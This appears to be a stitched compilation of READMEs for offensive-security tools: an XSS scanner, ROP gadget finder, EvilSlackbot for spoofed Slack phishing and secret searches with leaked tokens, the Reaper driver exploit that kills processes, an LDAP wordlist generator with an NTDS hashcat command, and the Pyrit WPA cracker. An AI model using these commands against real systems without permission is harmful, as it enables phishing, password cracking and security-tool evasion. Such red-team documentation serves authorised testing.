Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth (a minimal crawl sketch appears after the notes below).
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications; we have only tested it on websites developed with PHP, with remarkable results. Support for SPAs is planned for a future release.
Note:
This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.
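A minimal sketch of how these pieces could fit together: a whitelist-bounded, depth-limited crawl that skips the extensions from setting.json. This is illustrative only, not X-Recon's actual code, and the key name "skip_extensions" is an assumption, not the tool's real schema:

```python
# Minimal sketch: whitelist-bounded, depth-limited crawl that skips the
# file extensions listed in setting.json. Illustrative only; the key
# name "skip_extensions" is an assumption, not X-Recon's actual schema.
import json
from collections import deque
from urllib.parse import urljoin, urlparse

import requests
from bs4 import BeautifulSoup

with open("setting.json") as f:
    SKIP = tuple(json.load(f).get("skip_extensions", [".css", ".js", ".png"]))

def crawl(start_url, whitelist, max_depth):
    seen, queue = {start_url}, deque([(start_url, 0)])
    while queue:
        url, depth = queue.popleft()
        if depth >= max_depth:
            continue
        try:
            html = requests.get(url, timeout=10).text
        except requests.RequestException:
            continue
        for a in BeautifulSoup(html, "html.parser").find_all("a", href=True):
            link = urljoin(url, a["href"])
            # Follow only whitelisted subdomains and non-skipped extensions.
            if (urlparse(link).hostname in whitelist
                    and not link.lower().endswith(SKIP)
                    and link not in seen):
                seen.add(link)
                queue.append((link, depth + 1))
    return seen
```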
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
<binary>: Path to the binary file for analysis.
-s, --search SEARCH: Optional. Search for specific instruction patterns.
-f, --functions: Optional. Print function names and addresses.

Examples:
python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
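For intuition, here is a rough Python sketch of this kind of gadget search using Capstone. It is illustrative only, not ROPDump's implementation: it scans raw file bytes rather than properly mapped executable sections, and assumes x86-64:

```python
# Illustrative sketch of a ROP gadget search: find `ret` (0xC3) bytes and
# disassemble the few bytes before each one, keeping sequences that end
# in ret. Not ROPDump's actual code; real tools parse ELF/PE sections.
from capstone import Cs, CS_ARCH_X86, CS_MODE_64

def find_gadgets(code: bytes, base: int, depth: int = 8):
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i, b in enumerate(code):
        if b != 0xC3:  # ret opcode
            continue
        for start in range(max(0, i - depth), i + 1):
            insns = list(md.disasm(code[start:i + 1], base + start))
            if insns and insns[-1].mnemonic == "ret":
                yield base + start, "; ".join(
                    f"{x.mnemonic} {x.op_str}".strip() for x in insns)
                break

with open("/path/to/binary", "rb") as f:  # example path from above
    for addr, gadget in find_gadgets(f.read(), base=0):
        print(hex(addr), gadget)
```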
This is a simple SBOM utility which aims to provide an insider view on which packages are actually getting executed.
The objective is straightforward: get a clear view of the packages installed by APT (support for RPM and other package managers is in progress) and determine which of those packages are actually being executed.
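As a rough illustration of the static-info idea for APT, here is a short Python sketch that lists installed packages by parsing the dpkg status database on a mounted image. The /mnt path follows the tool's default --volume-path; this is not the tool's actual code:

```python
# Hedged sketch: enumerate installed APT packages on a mounted image by
# parsing the dpkg status database. /mnt matches the tool's default
# --volume-path; this is illustrative, not the utility's real logic.
def installed_packages(volume="/mnt"):
    pkgs, name, status = [], None, ""
    with open(f"{volume}/var/lib/dpkg/status") as f:
        for line in f:
            if line.startswith("Package:"):
                name = line.split(":", 1)[1].strip()
            elif line.startswith("Status:"):
                status = line.split(":", 1)[1].strip()
            elif line == "\n" and name:
                if "installed" in status:  # e.g. "install ok installed"
                    pkgs.append(name)
                name, status = None, ""
    return pkgs

print(len(installed_packages()), "packages installed")
```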
The packages needed are listed in the requirements.txt file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it's still quite a task for me.

Argument | Description
---|---
--analysis-mode | Specifies the mode of operation. Default is static. Choices are static and chroot.
--static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
--volume-path | Specifies the path to the mounted volume. Default is /mnt.
--save-file | Specifies the output file for JSON output.
--info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True.
--pkg-mgr | Manually specify the package manager, or omit this option for automatic detection.
APT:
- Static Info Analysis:
  - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
  - It analyzes the packages installed on the mounted volume located at /mnt.
  - It saves the output in a JSON file named output.json.
  - It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
- Static Service Analysis:
  - This command runs the program in static analysis mode, specifically using the Service file analysis method.
  - It analyzes the packages installed on the mounted volume located at /custom_mount.
  - It saves the output in a JSON file named output.json.
  - It does not generate visual plots for CHROOT analysis.

```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
```
- Chroot analysis with or without graphic output:
  - It analyzes the packages installed on the mounted volume located at /mnt.
  - It saves the output in a JSON file named output.json.
  - It generates visual plots for CHROOT analysis if --info-graphic is True, and skips them if False.

```bash
python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
- RPM - Static Analysis:
  - Similar to how it's done on APT, but only one type of static scan is available for now.

```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```

- RPM - Chroot Analysis:

```bash
python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect yet.
I am also working on Pacman support and trying to find a reliable way of accessing the Pacman database for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (links, files, spoofed messages).
EvilSlackbot requires python3 and Slackclient
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide a xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
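For intuition, the lookup-then-send flow described above roughly corresponds to the following slackclient calls. This is a hedged sketch, not EvilSlackbot's internals; the spoofed name/icon override requires the chat:write.customize scope, and the token, email, and URLs are placeholders:

```python
# Hedged sketch of the spoofed-message flow using the slackclient
# library the tool depends on. Illustrative only; scopes such as
# users:read.email and chat:write.customize must be granted to the bot.
from slack import WebClient

client = WebClient(token="xoxb-...")  # placeholder token

# Resolve the target's Slack ID from their email address (-e).
user_id = client.users_lookupByEmail(email="target@example.com")["user"]["id"]

# Post a message while overriding the bot's display name and icon (-sP).
client.chat_postMessage(
    channel=user_id,
    text="Please re-authenticate: https://example.com/login",
    username="IT Helpdesk",                       # spoofed display name
    icon_url="https://example.com/helpdesk.png",  # spoofed avatar
)
```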
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
Reaper is a proof-of-concept designed to exploit a BYOVD (Bring Your Own Vulnerable Driver) vulnerability. This malicious technique involves loading a legitimate, vulnerable driver onto a target system, which attackers can then exploit to perform malicious actions.
Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.
Note: Reaper does not kill the Windows Defender process, as that process is protected; Reaper is a simple proof of concept.
____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/
[Coded by MrEmpy]
[v1.0]
Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process
Values:
PROCESSID process id to suspend/kill
Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337
You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.
Note: The executable and driver must be in the same directory.
Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make money doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.
All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initialize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASNs that identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
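To illustrate that strategy, here is a hedged sketch of running Nuclei one template collection at a time. The collection names, target URL, and output paths are examples, and this is not Fire-Scanner's actual code:

```python
# Hedged sketch of per-collection scanning: invoke Nuclei once per
# template collection instead of all templates at once. Collection
# names and paths are illustrative examples.
import subprocess

collections = ["cves", "exposures", "misconfiguration", "default-logins"]

for templates in collections:
    subprocess.run(
        ["nuclei", "-u", "https://target.example.com",
         "-t", f"{templates}/",
         "-o", f"results-{templates}.txt"],
        check=False,  # keep going even if one collection errors out
    )
```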
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
To install headerpwn, run the following command:
go install github.com/devanshbatham/headerpwn@v0.0.3
headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:
- Provide your target URL with the -url flag.
- Create a file containing the headers you want to test, and pass its path with the -headers flag.

Example usage:
headerpwn -url https://example.com -headers my_headers.txt

The format of my_headers.txt should be like below:
Proxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
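For a sense of what headerpwn automates, here is a minimal sketch that replays the target URL once per header line and records how the responses differ. It uses the requests library; the URL and filename are the examples from above, and this is not headerpwn's actual code:

```python
# Hedged sketch: send one request per header line and print how the
# response status and size vary. Illustrative, not headerpwn's code.
import requests

with open("my_headers.txt") as f:
    lines = [line.strip() for line in f if ":" in line]

for line in lines:
    name, value = (part.strip() for part in line.split(":", 1))
    resp = requests.get("https://example.com",
                        headers={name: value}, timeout=10)
    print(f"{resp.status_code} {len(resp.content):>7} {name}: {value}")
```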
Follow these steps to proxy requests through Burp Suite:
1. Export Burp's certificate (Burp's proxy listener runs on 127.0.0.1:8080 by default).
2. Install Burp's certificate.
You should be all set:
headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080
The headers.txt file is compiled from various sources, including the SecLists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.
A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.
The bigger the domain is, the better the wordlist will be.
The wordlist is built from LDAP attributes such as name, sAMAccountName, and descriptions across the domain's objects, and is written to the path given by --outputfile.

To generate a wordlist from the LDAP of the domain domain.local you can use this command:
./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
You will get the following output if using the Python version:
You will get the following output if using the Powershell version:
Once you have this wordlist, you should crack your NTDS using hashcat with --loopback and the rule clem9669_large.rule.
./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback
$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_
usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.
Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP
Credentials:
--no-pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication-phase keys in a space-time tradeoff. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; this ultimately allows revealing the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating systems, and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc processors.
Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
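The underlying computation is standard: a WPA/WPA2 PMK is PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, at 4096 iterations with a 256-bit output. A minimal Python illustration (the passphrase and SSID are examples):

```python
# The computation Pyrit pre-computes: a WPA/WPA2 Pairwise Master Key is
# PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
import hashlib

def pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(),
                               ssid.encode(), 4096, 32)

print(pmk("password123", "MyHomeWiFi").hex())  # example inputs
```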
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

- Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
- Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
- Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
- AI Configuration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
- Integration: The --truffle and --truffle-build-directory options facilitate the integration of SherlockChain into popular development frameworks like Truffle.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
